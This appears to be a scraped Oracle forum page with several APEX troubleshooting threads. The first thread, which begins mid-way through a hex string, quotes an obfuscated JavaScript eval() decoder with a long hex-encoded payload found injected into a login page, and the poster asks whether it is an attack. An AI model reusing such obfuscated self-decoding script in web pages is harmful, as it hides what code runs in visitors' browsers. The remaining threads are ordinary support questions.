6c88b97d7dcd3d7ba9ca19989acecfafae0c4d5d7cb909899a4f8fafab8a5924a83834e4e8adad7cb884b64a18e51a6b8b1d7d39287a4a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4f1d7d39290adb4e0d7d2d3e6a592d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaab1d7d3928ca95f4f4f5dafe6ebf4e7a9ad9e96d7e2e7afa4cf8e498d95a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2e2e6cf8e949a9bced5d7cb90576996c08f4f535852a4f1d7d3928eabb4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2a0a4cf8e498f9c9bced5d7cb90576996c08f4f535852a4e7a9a99aa0d7d5dccdc4c88d576996c08f4f535b4e444ba6fafae0c4d5d7cb909596a4f8efd7d9e9e7e08e8ce9b8add7d9e9e7e0969ce6e7da8b4c9de0d7d2d3e69d4c9de0d7d2d3e6a59adbd2c4d5ddd8dd944c9de0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28b4c90929394667a7ab4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28ea6b8b1d7d39288a5a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3c7cddfd8a0a4cf8e9399a1e8d7d5e7e6dbd7d58f585c605d667a5f8adce8e4929ef8e799a1e8d7d5e7e6dbd7d58f585c5d5a667a5f51519ef8e79997d7d2c9ddc7b58e4a5c5c4b667a6a5e5aa4e5a7b1e6e7dae2efd7d9e9e7e08e8ae7b8b1d7d392819ea3dbe3d1d7ddd8dd969596a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4e4cf8e578dbad3a265695da2d9d8e79c9798667a7aa3c7cddfd88ea4f1d7d39290ada1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaaaaacad9e96dad7cbe3efd7d9e9e7e08e8fecb8a4cf8e498ee9f8f0ede9d5d4d5868d9b93d1d1d2d2d3e2e7b07a5f97e3d2c9cbcfd7d3c9864ba4edd7d9e9e7e0ebf3d7d3928ca965959b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd8f5eabe3e1d89568ac9b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd9ca4d7cde1da9f5c445dafe6ebf4e79a9bced5d7cb90575d5d58a6e0c4d5d7cb909697a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e6cf8e50498d95a5f8a494a97a7aabe3e1d895a5f8a494a97a7ab2e3d2c9cbcfd7d3c98da5f8a4949a9bced5d7cb90578dbacf9d4e53585252a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e9a9a792949564a4cf8e909094954f4c8d8f94954f4c4e49848c52a4f1d7d3928ba8a1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a8bd7dee5e9964b64a699a2ede9d5a25f8ad1cdc8c9d3905da6999ccfced2a2a2a0a699a4d7cde1daa2a19fa89b8fd1e0d5d3d2a7abd1d5d08c9394a6fab8b1d7d39286a3a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7b4e0d7d2d3e6a592d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d4a88d5e1df8f4b64a1d5e19a9ed7d3928ba86d6ba6a7a6989ad1d3d5dbdca3a6965654a4dc8992c5c6c886a6e0a0b1e6e7dae2b8a4cf8e494298e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79ba4f2e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79a4a8edbd0c5864e959592c7cddfd88ea6e2d1dfd8e0e4cf8e494298e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29da4f2e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29c4a91dddadbd0c5864e9592a6e2d1dfd8e0f2e0d7d2d3e6a59ddddadbd0c5a1a6e6fafaa65198de9a9ce69f64"));
    </script>
    <title>Bienvenido</title>
    HERE i Found the var pn with CSRT Value, so it is the problem,
    the HTML code generate for the same page from the domain b is the next:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html lang="es-mx" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head>
    <title>Bienvenido</title>
    Here between <head> tag and <title> tag is empty and it works fine, do you think that it could be and attack to domain a?
    if I try to access the developer environment from domain a the code of the login page is
    <!DOCTYPE html>
    <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head><script language="JavaScript">var pn = "CSRT"; var pv = '3921513832723665401';
    eval(function(a){var b=a.split("");var d=b.length;var c=parseInt(b[0]+b[1],16);var f=String.fromCharCode(c);for(var e=2;e<d;e++){var g=(parseInt(b[e]+b[e+1],16)-c)%256;c=g;f+=String.fromCharCode(g);e++}return f}("288edbe3d1d7ddd8dd968d91908da4f1d7d39283a0a3c7cddfd8a0b1d7d392829fa3dbe3d1d7ddd8dd969495a4f1d7d3928daaa9a7a4cf8e958e5eabe3e1d8924c938e5e5f444ba4e4cf8e909095964f4c8d8f95964f4c4e555e6e7aaa9b97d7d2c9ddc7b58e8d904d5f5f4d8f8d5252a4f1d7d3928ba8aa9b97d7d2c9ddc7b58e4a45454b64a4cf8e938c5e6a5e5aa4e7dbd2c4cdcbd1d7cba3aa9ba1e8d7d5e7e69a939464a8aaaa9ba1e8d7d5e7e69a585c9794a6f3d7d3928aa7aa9b97d7d2c9ddc7b58e4a61614b64a4cf8e92a77a6a5e574c918c5e6a5e5aa4edd7d9e9e7e08e8ce9e6cf8e928b5e6a5e5aa4e8aaaa9ba0d7d5dccdc4c88d578bcf9d4e535b4e444b64a4cf8e959ba1d8c6d3d5cb90578b9b635358667a6a5e5aa4e898685f48489ffae2d1dfd8e0e898685f61619fea9868a2904d5f5f4d8f9fa4cf8e938c5e6a5e5aa4e89868a9dbd2c4cdcbd1d7cbe3fafaefd7d9e9e7e08e8deab8b1d7d39289a6a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7a3dbe3d1d7ddd8dd96969a9895a4f1d7d3928daaa1d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d969764a1d5e19a9ed7d3928ba86d6ba6a7a99b9ad1d3d5dbdca3a6965654a4efe6ebf4f1d7d3928facaac8c6c88b97d7dcd3d7ba9ca19987b1d7d39291ae9f8a95c8c6c88b95ccd9b5b5e8e6dbcbd7e9d98d94985e5b5264a4cf8e99925eabe3e1d8924c97925e5f444ba4e8c8c6c88ba1d8d9b5b5e8e6dbcbd7e9d98d94989d9a64a4cf8e95c8c6c88b97d7dcd3d7ba9ca1996d5eac98a4e8c8c6c88b97d7dcd3d7ba9ca19989acecfafae0c4d5d7cb909899a4f8fafab8a5924a83834e4e8adad7cb884b64a18e51a6b8b1d7d39287a4a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4f1d7d39290adb4e0d7d2d3e6a592d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaab1d7d3928ca95f4f4f5dafe6ebf4e7a9ad9e96d7e2e7afa4cf8e498d95a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2e2e6cf8e949a9bced5d7cb90576996c08f4f535852a4f1d7d3928eabb4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2a0a4cf8e498f9c9bced5d7cb90576996c08f4f535852a4e7a9a99aa0d7d5dccdc4c88d576996c08f4f535b4e444ba6fafae0c4d5d7cb909596a4f8efd7d9e9e7e08e8ce9b8add7d9e9e7e0969ce6e7da8b4c9de0d7d2d3e69d4c9de0d7d2d3e6a59adbd2c4d5ddd8dd944c9de0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28b4c90929394667a7ab4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28ea6b8b1d7d39288a5a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3c7cddfd8a0a4cf8e9399a1e8d7d5e7e6dbd7d58f585c605d667a5f8adce8e4929ef8e799a1e8d7d5e7e6dbd7d58f585c5d5a667a5f51519ef8e79997d7d2c9ddc7b58e4a5c5c4b667a6a5e5aa4e5a7b1e6e7dae2efd7d9e9e7e08e8ae7b8b1d7d392819ea3dbe3d1d7ddd8dd969596a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4e4cf8e578dbad3a265695da2d9d8e79c9798667a7aa3c7cddfd88ea4f1d7d39290ada1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaaaaacad9e96dad7cbe3efd7d9e9e7e08e8fecb8a4cf8e498ee9f8f0ede9d5d4d5868d9b93d1d1d2d2d3e2e7b07a5f97e3d2c9cbcfd7d3c9864ba4edd7d9e9e7e0ebf3d7d3928ca965959b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd8f5eabe3e1d89568ac9b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd9ca4d7cde1da9f5c445dafe6ebf4e79a9bced5d7cb90575d5d58a6e0c4d5d7cb909697a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e6cf8e50498d95a5f8a494a97a7aabe3e1d895a5f8a494a97a7ab2e3d2c9cbcfd7d3c98da5f8a4949a9bced5d7cb90578dbacf9d4e53585252a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e9a9a792949564a4cf8e909094954f4c8d8f94954f4c4e49848c52a4f1d7d3928ba8a1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a8bd7dee5e9964b64a699a2ede9d5a25f8ad1cdc8c9d3905da6999ccfced2a2a2a0a699a4d7cde1daa2a19fa89b8fd1e0d5d3d2a7abd1d5d08c9394a6fab8b1d7d39286a3a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7b4e0d7d2d3e6a592d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d4a88d5e1df8f4b64a1d5e19a9ed7d3928ba86d6ba6a7a6989ad1d3d5dbdca3a6965654a4dc8992c5c6c886a6e0a0b1e6e7dae2b8a4cf8e494298e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79ba4f2e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79a4a8edbd0c5864e959592c7cddfd88ea6e2d1dfd8e0e4cf8e494298e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29da4f2e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29c4a91dddadbd0c5864e9592a6e2d1dfd8e0f2e0d7d2d3e6a59ddddadbd0c5a1a6e6fafaa65198de9a9ce69f64"));
    </script>
    and obviously i Can't access
    Please help me...
    tx in advance

  • URL Region wwv_flow.accept error

    Hey,
    I am trying to create a very simple URL region on a page with nothing else on it (breadcrumbs, and tabs)
    And while the region displays fine, as soon as I try to navigate to another page in the app, I get the following error message:
    Mon, 30 Jun 2008 14:17:00 GMT
    wwv_flow.accept: SIGNATURE (parameter names) MISMATCH
    VARIABLES IN FORM NOT IN PROCEDURE: HL,IE,Q
    NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
    And the url shows exactly what the error suggests, that it is stalling on wwv_flow.accept: http://...pls/apex/wwv_flow.accept
    Any help would be sincerely appreciated,
    Thanks,
    ~Chris

    Sounds like you are embedding some HTML containing form input items. If the URL region is situated between the form open/close tags in the containing Application Express page, this won't work if you use any controls on your page to submit the page.
    Scott

  • Internet explorer 10 . wrapping of text

    My label in chrome and mozilla  appear as " Select Input Name "
    but in Internet Explorer 10 appears as
    Select Input
    Name
    (fragmented into 2 lines)
    Can you tell me why is there wrapping in IE 10?
    How do I correct this issue?
    The version is -
    Oracle JDeveloper 11g Release 1
    Thanks in advance

    Hi,
    for why this is, you should contact Microsoft. Browsers are not behaving the same and thus what you see may happen. You can try CSS on the inlineStyle property like
    white-space:nowrap;
    Frank

  • Wrapping In Internet Explorer 10

    My label in All browsers appear as " Select Input Name "
    but in Internet Explorer 10 appears as
    Select Input
    Name
    Can you tell me why is there wrapping in IE 10?
    How do I correct this issue?
    Thanks in advance

    As you are no telling us your jdev version we really can't help. Solutions, if any,  are depending on this version.
    Timo

  • Can't reload internet explorer

    my internet explorer was corrept,  tryed to reload responce was already loaded
    removed internet explorer then tried to reload the software  responce was already loaded
    question is how or what do I have to do to reload it.
    my name is James

    my internet explorer was corrept
    What does that mean?  What are your problem symptoms?
    question is how or what do I have to do to reload it.
    Unfortunately there is no generalized repair or reinstall for IE.  Depending on the OS and version of IE there are various things you can try to do to modify it.  Otherwise, it is considered a component of the OS and only repaired when the OS is
    repaired.
    Post more details if you need help.
    Robert Aldwinckle

  • How do i see which parameters are being passed to wwv_flow.accept?

    Greetings everyone,
    After submiting a page i get this error:
    "The requested URL /pls/apex/wwv_flow.accept was not found on this server."
    I placed some inserts inside my page process to check and i found out the process isn t even being executed.
    This post seems to have some similarities to what is happening to me:
    doSubmit in javascript
    But all the items i need to change are being changed with javascript in the same page, after submiting they get the new values.
    What gets weirder is that it works properly in firefox and google chrome browser, however it is company politics that all aplications work in internet explorer and in internet explorer it doesn't work.
    So i would like to know how to see what is being passed to wwv_flow.accept so i can discard that option?
    Regards Pedro

    Greetings,
    I am working with Pedro Mendez in the same project.
    To give you more information about the problem, here is an example of the html structure in the page, just the div wich is causing problems:
    <div id="empresas">
    <form id="empresas_form" method="POST" action="" name="empresas_form">
    <input type="checkbox" name="empresas" value="DEMO2"/>
    Empresa Demonstração ( Demo 2)
    <input type="checkbox" name="empresas" value="SPA"/>
    SPA
    <input type="checkbox" name="empresas" value="GRH2"/>
    GRH2 - Brodheim
    <input type="checkbox" name="empresas" value="DEMO3"/>
    DEMO3 DEMONSTRAÇÂO
    <input type="checkbox" name="empresas" value="GRH"/>
    GRH - IMO
    <input type="checkbox" name="empresas" value="OK"/>
    OK
    <input type="checkbox" name="empresas" value="VALSAN"/>
    Valentim Santos
    </form>
    </div>
    To my understanding the variable that shoudl cause problems would be empresas_form and not empresas, since empresas is just a div.
    I need the checkboxes to be inside a form or i can t access them and i need to perform operations on them, any suggestions?
    best regards

  • After 4.2.1 upgrade get:  requested URL /pls/apex/wwv_flow.accept not found

    Hi,
    Our hosted site just upgraded to 4.2.1 and I am getting:
    The requested URL /pls/apex/wwv_flow.accept was not found on this server.
    After trying to make a change on a master/detail form. I thought Apex 4.2 increased the # of fields on a master detail form so was surprised to see this error. Even when I reduce the number of columns showing on the detail part of the form which can have many rows as well, I am still getting the above error.
    Has there been any change in 4.2 that would change the behavior of a straightforward save of a multi row master detail form?
    In the past with Apex 4.0 I had to limit the columns being shown, but now I am reducing the # of columns even further and still get the error.
    UPDATE: I just removed from the report region definition several columns (which were deselected from the Report Attributes so not actually showing in the master-detail form) and now I am at least able to add rows and save changes. Again I am totally surprised that this behavior is happening when I thought 4.2 allowed for MORE page items!!
    I still cannot Delete rows from the detail section -- I get the odd message of :
    ORA-02292: integrity constraint (ENTERPRISE_SYSTEMS.RESOURCE_REQUEST_CON) violated - child record found
    But these rows have no child record!! They ARE the child records of the Master form. I had seen this behavior again related to the number of items showing on a page. Seems to me to be a bug in Apex that I had hoped would be removed with the 4.2 upgrade.
    Am I missing something!!
    PM
    Edited by: patfmnd on Dec 28, 2012 10:39 AM

    For the first problem, I'd check the alert log first, location:
    select * from v$parameter where name like '%user_dump_dest%';

  • Mod_plsql: /pls/apex/wwv_flow.accept HTTP-400 Too many arguments passed in.

    Hi All ,
    I want one solution i have a report which fectches the ppt that r stored in db,If i search more results it errors out so i have reduced the results and it was working fine.Now i see it is giving the same error(as below) althorugh it was working fine by reducing results in query.Can anybody please help me in this.
    the error is
    Bad Request
    Your browser sent a request that this server could not understand.
    mod_plsql: /pls/apex/wwv_flow.accept HTTP-400 Too many arguments passed in. Got 3250 parameters. Upper limit is 2000
    Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server Server at insightapps.oraclecorp.com Port 80

    Section 1.10 of the Oracle HTTP Server mod_plsql User's Guide states the following
    The total number of name value pairs that can be passed to a PL/SQL procedure is 2000.
    mod_plsql limits the total number of parameters that can be passed to a single procedure to 2000.
    mod_plsql limits the size of a single parameter that can be passed to a procedure to 32000 bytes.
    It would be helpful to know how each of these apply in the APEX context
    Varad

  • Error on File upload. Error processing wwv_flow.accept.

    Hi,
    I'm developing an application to upload and download files using Oracle XE 10g and APEX 3.2.0.00.27 on OS Windows XP.
    The file upload page is very simple: one file browse item, a submit button and a report based on the wwv_flow_files table.... and an extra button to save the uploaded files in the DB.
    Sometimes (almost everytime) when I press the submit button, the wwv_flow.accept process fails and I'm redirected to a page saying Internet Explorer cannot display the webpage.
    I'm forced to refresh the page and then I get the following message:
    Expecting p_company or wwv_flow_company cookie to contain security group id of application owner.
    Error ERR-7621 Could not determine workspace for application (:) on application accept.
    I recreated the same page in the apex.oracle.com environment and it works, but it fails in my local environment.
    I have read some posts int his forum, but I haven't found an answer yet.
    Please help!!!
    AUJ

    varad acharya wrote:
    Download the standalone OHS.
    http://www.oracle.com/technology/software/products/database/oracle11g/111060_win32soft.html
    varadSorry about this...old post and off topic.
    Can anyone point me to a standalone version of OHS for linux x86-64? I'm having troubles finding this, it doesn't appear to have installed with 11g Enterprise Edition and I cannot find it in the available packages when I re-run the installer. I'm running 11g EPG now and want to convert to Apache.
    Thanks!!!

Maybe you are looking for

  • SOA Suite 11.1.1.3.0 (patch)  information required.

    I am trying to setup SOA 11g but still having no luck. this statement is written in every installation guide Download SOA Suite 11.1.1.3.0 (patch) from the FMW download page, in the Runtime Software section. but i am unable to find any patch of SOA S

  • Flash Gallery Issues.

    Hey guys, I have a flash gallery that works all correctly.  The only problem I have is when I go to load the site in the same browser for the second time it displays the last image within the gallery for all of the images.  I know I need a reload scr

  • Isqlplus crashing

    i have the same problem. my log file: 04/10/13 03:05:32 Started 04/10/13 03:05:36 isqlplus: jsp: init 04/10/13 03:05:36 isqlplus: config: init 04/10/13 03:05:36 isqlplus: uix: init 04/10/13 03:05:36 isqlplus: /WEB-INF/uix-config.xml: Parsing error, l

  • Oracle to Groupwise/e-mail

    We are currently using Oracle 8.1.6 and are using Groupwise as our e-mail system. A request has been made to generate e-mail notifications from the oracle system. They do not desire to get the oracle e-mail server. Does anyone have examples of Java p

  • Premier Elements 10 Camera Raw 6.6 update fails

    Running the Camera Raw 6.6 update for Premier Elements 10 fails with the message: Update Failed ! Updates could not be applied Error log says: Elements Camera Raw 6.6 Updates Installation failed. Error Code: U44M2P7 Windows 7 64-bit What gives?  How